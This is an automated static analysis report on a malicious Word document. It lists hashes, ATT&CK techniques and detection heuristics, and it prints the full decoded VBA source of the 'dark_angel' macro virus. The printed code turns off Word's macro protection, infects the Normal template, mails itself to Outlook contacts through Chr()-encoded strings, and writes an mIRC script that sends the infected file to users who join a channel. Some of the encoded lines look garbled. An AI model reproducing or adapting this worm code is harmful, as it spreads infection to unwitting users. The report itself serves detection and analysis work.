Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e5f67463e0ba305…

MALICIOUS

Office (OLE)

46.5 KB Created: 2002-01-24 12:56:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 55a8c800f8ea45ff813857fcacd23af8 SHA-1: 4a2f2172cddc42778f376882f9baa86dcdf14242 SHA-256: 6e5f67463e0ba3057bfc849ce01bfb89e5cbb2dc653043e4480041045e14391c
396 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains heavily obfuscated VBA macros within a Document_Open auto-execution routine. These macros utilize WScript.Shell to write a registry value and attempt to export a DLL to disk. The script's intent is to download and execute a second-stage payload, likely a DLL, and establish persistence by writing to a registry key.

Heuristics 9

  • ClamAV: Doc.Trojan.Tech-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Tech-4
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set dirwin = FSO.GetSpecialFolder(0)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Options.VirusProtection = (Rnd * 0)
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set dirwin = FSO.GetSpecialFolder(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Options.VirusProtection = (Rnd * 0)
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set dirwin = FSO.GetSpecialFolder(0)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    On Error Resume Next
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Final611$ = RRKP1$ & OAYR2$
    ActiveDocument.SaveAs Environ("WINDIR") & "\darkangel.doc"
    SetAttr "C:\Windows\darkangel.doc", vbReadOnly
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14123 bytes
SHA-256: 0f2721761418e072ed59d87b1e711916990ab93c002d1fff1bd269fd59f129a4
Detection
ClamAV: Doc.Trojan.Tech-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DarkAngel"
    
Private Sub Document_Open()
On Error Resume Next
'dark_angel Macro Virus (c) by Energy
'Thx to Necronomikon[Zer0Gravity] for help
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.ShowVisualBasicEditor = (Rnd * 0)
Application.VBE.ActiveVBProject.VBComponents("darkangel").Export "c:\windows\darkangel.dll"
Options.ConfirmConversions = (Rnd * 0)
Options.SaveNormalPrompt = (Rnd * 0)
Options.VirusProtection = (Rnd * 0)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set dirwin = FSO.GetSpecialFolder(0)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
 If regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel") <> "by Energy" Then
  user = regedit.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
  ActiveDocument.SaveAs FileName:=dirwin & "\darkangel.doc", FileFormat:=wdFormatDocument
  If ToolsWordCount.Count <= 500 Then
    For A = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(A).Name = "darkangel" Then NormInstall = True
            Next A
    For A = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(A).Name = "darkangel" Then ActivInstall = True
            Next A
        If ActivInstall = True And NormInstall = False Then Set Secj = NormalTemplate.VBProject _
            Else If ActivInstall = False And NormInstall = True Then Set Secj = ActiveDocument.VBProject
End If
RRKP1$ = Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(32) + ""
Chr (61) + Chr(32) + Chr(67) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + ""
Chr (116) + Chr(40) + Chr(34) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(112) + ""
Chr (112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(34) + Chr(41) + Chr(13) + Chr(10) + ""
Chr (32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + ""
Chr (117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(71) + Chr(101) + Chr(116) + Chr(78) + Chr(97) + Chr(109) + Chr(101) + ""
Chr (83) + Chr(112) + Chr(97) + Chr(99) + Chr(101) + Chr(40) + Chr(34) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(34) + Chr(41) + Chr(13) + Chr(10) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(46) + Chr(76) + Chr(111) + Chr(103) + Chr(111) + ""
Chr (110) + Chr(32) + Chr(34) + Chr(112) + Chr(114) + Chr(111) + Chr(102) + Chr(105) + Chr(108) + Chr(101) + Chr(34) + Chr(44) + Chr(32) + Chr(34) + Chr(112) + ""
Chr (97) + Chr(115) + Chr(115) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(70) + Chr(111) + Chr(114) + Chr(32) + Chr(89) + Chr(32) + Chr(61) + Chr(32) + Chr(49) + Chr(32) + Chr(84) + Chr(111) + Chr(32) + Chr(77) + ""
Chr (65) + Chr(80) + Chr(73) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(76) + Chr(105) + Chr(115) + Chr(116) + ""
Chr (115) + Chr(46) + Chr(67) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Ch(66) + Chr(111) + ""
Chr (111) + Chr(107) + Chr(32) + Chr(61) + Chr(32) + Chr(77) + Chr(65) + Chr(80) + Chr(73) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + ""
Chr (101) + Chr(115) + Chr(115) + Chr(76) + Chr(105) + Chr(115) + Chr(116) + Chr(115) + Chr(40) + Chr(89) + Chr(41) + Chr(13) + Chr(10) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(88) + Chr(32) + Chr(61) + Chr(32) + Chr(49) + Chr(13) + ""
Chr (10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(83) + Chr(101) + Chr(116) + Chr(32) + ""
Chr (79) + Chr(117) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + ""
Chr (67) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(73) + Chr(116) + Chr(101) + Chr(109) + Chr(40) + Chr(48) + Chr(41) + Chr(13) + Chr(10) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(111) + Chr(114) + Chr(32) + Chr(111) + Chr(111) + Chr(32) + Chr(61) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(70)
Chr (49) + Chr(32) + Chr(84) + Chr(111) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + ""
Chr (100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + Chr(105) + Chr(101) + Chr(115) + Chr(46) + Chr(67) + ""
Chr (111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + Chr(108) + Chr(32) + Chr(61) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + ""
Chr (111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + ""
Chr (105) + Chr(101) + Chr(115) + Chr(40) + Chr(88) + Chr(41) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(82) + Chr(101) + Chr(99) + Chr(105) + Chr(112) + Chr(105) + Chr(101) + Chr(110) + ""
Chr (116) + Chr(115) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + Chr(108) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(88) + Chr(32) + Chr(61) + Chr(32) + Chr(88) + Chr(32) + Chr(43) + ""
Chr (32) + Chr(49) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(73) + Chr(102) + Chr(32) + Chr(88) + Chr(32) + Chr(62) + Chr(32) + Chr(51) + Chr(48) + Chr(32) + Chr(84) + Chr(104) + Chr(101) + Chr(110) + Chr(32) + Chr(111) + ""
Chr (111) + Chr(32) + Chr(61) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(121) + Chr(66) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + ""
Chr (115) + Chr(115) + Chr(69) + Chr(110) + Chr(116) + Chr(114) + Chr(105) + Chr(101) + Chr(115) + Chr(46) + Chr(67) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(13) + ""
Chr (10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(78) + Chr(101) + Chr(120) + Chr(116) + Chr(32) + ""
Chr (111) + Chr(111) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + ""
Chr (116) + Chr(46) + Chr(83) + Chr(117) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(82) + Chr(69) + Chr(58) + Chr(34) + ""
Chr (13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + ""
Chr (66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(84) + Chr(104) + Chr(101) + Chr(32) + Chr(84) + ""
Chr (114) + Chr(117) + Chr(101) + Chr(32) + Chr(84) + Chr(105) + Chr(109) + Chr(101) + Chr(32) + Chr(83) + Chr(116) + Chr(111) + Chr(114) + ""
Chr (121) + Chr(32) + Chr(97) + Chr(98) + Chr(111) + Chr(117) + Chr(116) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(84) + Chr(86) + ""
Chr (32) + Chr(83) + Chr(101) + Chr(114) + Chr(105) + Chr(101) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + Chr(32) + Chr(65) + Chr(110) + Chr(103) + Chr(101) + ""
Chr (108) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + ""
Chr (46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(38) + ""
Chr (32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(34) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + ""
Chr (79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + ""
Chr (32) + Chr(38) + Chr(32) + Chr(34) + Chr(86) + Chr(105) + Chr(115) + Chr(105) + Chr(116) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + ""
Chr (65) + Chr(110) + Chr(103) + Chr(101) + Chr(108) + Chr(46) + Chr(100) + Chr(111) + Chr(99) + Chr(44) + Chr(32) + Chr(97) + Chr(110) + Chr(100) + Chr(32) + Chr(121) + Chr(111) + Chr(117) + ""
Chr (32) + Chr(99) + Chr(97) + Chr(110) + Chr(32) + Chr(115) + Chr(101) + Chr(101) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(83) + Chr(116) + Chr(111) + Chr(114) + Chr(121) + ""
Chr (32) + Chr(97) + Chr(98) + Chr(111) + Chr(117) + Chr(116) + Chr(32) + Chr(74) + Chr(97) + Chr(109) + Chr(101) + ""
Chr (115) + Chr(32) + Chr(67) + Chr(97) + Chr(109) + Chr(101) + Chr(114) + Chr(111) + Chr(110) + Chr(180) + Chr(115) + Chr(32) + Chr(68) + Chr(97) + Chr(114) + Chr(107) + Chr(32) + Chr(65) + ""
Chr (110) + Chr(103) + Chr(101) + Chr(108) + Chr(34) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + ""
Chr (117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + Chr(32) + Chr(61) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(66) + Chr(111) + Chr(100) + Chr(121) + ""
Chr (32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + ""
Chr (38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Chr(32) + Chr(38) + Chr(32) + Chr(118) + Chr(98) + Chr(67) + Chr(114) + Chr(76) + Chr(102) + Ch(13) + Chr(10) + Chr(32) + ""
Chr (32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(65) + Chr(116) + Chr(116) + Chr(97) + Chr(99) + ""
Chr (104) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115) + Chr(46) + Chr(65) + Chr(100) + Chr(100) + Chr(32) + Chr(40) + Chr(100) + Chr(105) + Chr(114) + Chr(119) + Chr(105) + Chr(110) + ""
Chr (32) + Chr(38) + Chr(32) + Chr(34) + Chr(92) + Chr(100) + Chr(97) + Chr(114) + Chr(107) + Chr(97) + Chr(110) + Chr(103) + Chr(101) + Chr(108) + Chr(46) + Chr(100) + Chr(111) + Chr(99) + Chr(34) + ""
Chr (41) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + Chr(68) + Chr(101) + ""
Chr (108) + Chr(101) + Chr(116) + Chr(101) + Chr(65) + Chr(102) + Chr(116) + Chr(101) + Chr(114) + Chr(83) + Chr(117) + Chr(98) + Chr(109) + Chr(105) + Chr(116) + Chr(32) + Chr(61) + Chr(32) + Chr(84) + ""
Chr (114) + Chr(117) + Chr(101) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(79) + Chr(117) + Chr(116) + Chr(46) + ""
Chr (83) + Chr(101) + Chr(110) + Chr(100) + Chr(13) + Chr(10) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(77) + Chr(97) + Chr(105) + ""
Chr (108) + Chr(32) + Chr(61) + Chr(32) + Chr(34) + Chr(34)
Final611$ = RRKP1$ & OAYR2$
ActiveDocument.SaveAs Environ("WINDIR") & "\darkangel.doc"
SetAttr "C:\Windows\darkangel.doc", vbReadOnly
SetAttr "C:\windows\darkangel.dll", vbReadOnly
SetAttr "C:\mirc\system\script.ini", vbReadOnly
Open "C:\mirc\system\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:text:     *:?:{ s *2 | halt }"
Print #1, "n1=alias /s / *"
Print #1, "n2=on 1:connect:/.enable #d"
Print #1, "n3=#d off"
Print #1, "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick ""c:\windows\darkangel.doc"" } | .disable #d | .timer 1 30 .enable #d }"
Print #1, "n5=#d end"
Close #1
Secj.VBComponents.Import ("c:\windows\darkangel.dll")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
      Next Y
      MAPI.Logoff
      regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\darkangel", "(c) by Energy@rRlf.de"
 End If
End Sub
Private Sub Document_Close()
Dim M
M = Int((3 * Rnd) + 1)
 If M = 2 Then
  msg = "Dark Angel (Jessica Alba)" & vbCrLf & "(c) by Energy"
  MsgBox msg, vbCritical, "please retype DarkAngel.doc"
 End If
End Sub